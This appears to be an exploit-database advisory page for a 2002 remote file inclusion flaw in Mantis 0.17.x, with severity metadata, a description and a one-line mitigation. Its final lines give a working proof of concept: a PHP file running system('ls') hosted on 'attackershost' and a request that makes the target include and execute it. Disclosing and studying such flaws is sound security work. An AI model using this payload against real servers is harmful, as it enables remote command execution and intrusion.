Mantis Remote File Inclusion Vulnerability

vendor:

Mantis

by:

SecurityFocus

8.8

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: Mantis

Affected Version From: Mantis 0.17.0

Affected Version To: Mantis 0.17.4

Patch Exists: YES

Related CWE: CVE-2002-1390

CPE: o:mantis:mantis

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2002

Mantis Remote File Inclusion Vulnerability

Mantis is vulnerable to a Remote File Inclusion vulnerability due to its failure to properly validate the path to the include file. Attackers can specify an arbitrary path, either to a local file or a file on a remote server, and include PHP files located on remote servers. This can lead to the execution of arbitrary commands with the privileges of the webserver.

Mitigation:

Ensure that the path to the include file is properly validated.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/5504/info

Mantis depends on include files to provide some functionality, such as dynamic generation of graphs. However, since Mantis does not properly validate the path to the include file, it is possible for attackers to specify an arbitrary path, either to a local file or a file on a remote server. 

Attackers may use this to include PHP files located on remote servers. Execution of arbitrary commands with the privileges of the webserver is the result of successful exploitation.

The attacker may create the following file (listings.txt) on a server they have access to:

<?php
system('ls');
exit;
?>

And then cause it to be included with the following request:

http://target/mantis/summary_graph_functions.php?g_jpgraph_path=http%3A%2F%2Fattackershost%2Flistings.txt%3F